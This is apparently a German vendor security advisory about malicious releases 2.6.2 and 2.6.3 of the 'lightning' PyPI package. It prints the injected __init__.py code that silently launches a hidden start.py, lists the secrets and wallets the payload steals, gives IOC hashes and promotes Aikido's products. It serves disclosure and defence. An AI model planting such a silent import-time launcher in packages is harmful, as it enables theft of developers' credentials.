Die Mini Shai-Hulud Supply-Chain-Kampagne hat sich auf PyPI ausgebreitet. Versionen 2.6.2 und 2.6.3 des beliebten lightning Python-Pakets, das weit verbreitet zum Trainieren von PyTorch-Modellen verwendet wird, enthält bösartigen Code, der stillschweigend Entwickler-Anmeldeinformationen, Cloud Secrets und Kryptowährungs-Wallets exfiltriert.
Dies folgt auf zwei jüngste Angriffe derselben Kampagne: die Bitwarden CLI npm Kompromittierung und die SAP npm Kompromittierung. Derselbe Angreifer, derselbe Wurm, der jetzt von npm zu PyPI wechselt.
Wenn Sie verwenden lightning==2.6.2 oder lightning==2.6.3, betrachten Sie Ihre Maschine als kompromittiert.
So funktioniert's
Der Angriff wird direkt in __init__.py, die Datei, die ausgeführt wird, sobald Sie das Paket importieren. Ein Hintergrund-Thread wird gestartet, bevor legitimer Lightning-Code geladen wird:
def _run_runtime() -> None:
_runtime_dir = os.path.join(os.path.dirname(__file__), "_runtime")
_start = os.path.join(_runtime_dir, "start.py")
if os.path.exists(_start):
subprocess.Popen(
[sys.executable, _start],
cwd=_runtime_dir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
threading.Thread(target=_run_runtime, daemon=True).start()Es führt aus start.py, einen plattformübergreifenden Bun-Bootstrapper, der Ihr Betriebssystem und Ihre Architektur erkennt, die Bun JavaScript-Laufzeitumgebung v1.3.13 herunterlädt und router_runtime.js, die 11 MB große Haupt-Payload, aus. Das gleiche Muster wurde bei den jüngsten Bitwarden- und SAP-Angriffen verwendet.
Was es stiehlt
SSH-Schlüssel, Shell-Historien (bash, zsh, Python, Node, MySQL, psql), .env Dateien, Git-Anmeldeinformationen, AWS-/GCP-/Azure-Anmeldeinformationen, Kubernetes- und Helm-Konfigurationen, Docker-Anmeldeinformationen, npm-Tokens und MCP-Konfigurationen. Kryptowährungs-Wallets einschließlich Bitcoin, Litecoin, Monero, Dogecoin, Dash, Exodus, Atomic und Ledger. VPN-Anmeldeinformationen für NordVPN, ProtonVPN, CyberGhost, Windscribe und OpenVPN. Discord- und Slack-Sitzungsdaten.
Alle gestohlenen Daten werden RSA-2048 verschlüsselt, bevor sie an öffentliche GitHub-Repositories exfiltriert werden:
Wie Aikido dies erkennt
Wenn Sie ein Aikido-Benutzer sind, überprüfen Sie Ihren zentralen Feed und filtern Sie nach Malware-Problemen. Dies wird als kritisches Problem mit 100/100 angezeigt. Aikido führt nächtliche Rescans durch, aber wir empfehlen, jetzt einen manuellen Rescan auszulösen.
Wenn Sie noch kein Aikido-Benutzer sind, können Sie ein Konto erstellen und Ihre Repos verbinden. Unsere Malware-Abdeckung ist im kostenlosen Plan enthalten, keine Kreditkarte erforderlich.
Für eine umfassendere Abdeckung Ihres gesamten Teams bietet Aikidos Endpoint Protection Ihnen Transparenz und Kontrolle über die Softwarepakete, die auf den Geräten Ihres Teams installiert sind. Es deckt Browser-Erweiterungen, Code-Bibliotheken, IDE-Plugins und Build-Abhängigkeiten ab, alles an einem Ort. Stoppen Sie Malware, bevor sie installiert wird.
Für zukünftigen Schutz sollten Sie Aikido Safe Chain (Open Source) in Betracht ziehen. Safe Chain integriert sich in Ihren bestehenden Workflow, indem es npm-, npx-, yarn-, pnpm- und pnpx-Befehle abfängt und Pakete vor der Installation gegen Aikido Intel prüft.
IOCs
- Paket:
lightning==2.6.2,lightning==2.6.3 - router_runtime.js
- SHA256:
5f5852b5f604369945118937b058e49064612ac69826e0adadca39a357dfb5b1
- SHA256:
- start.py
- SHA256:
8046a11187c135da6959862ff3846e99ad15462d2ec8a2f77a30ad53ebd5dcf2
- SHA256:
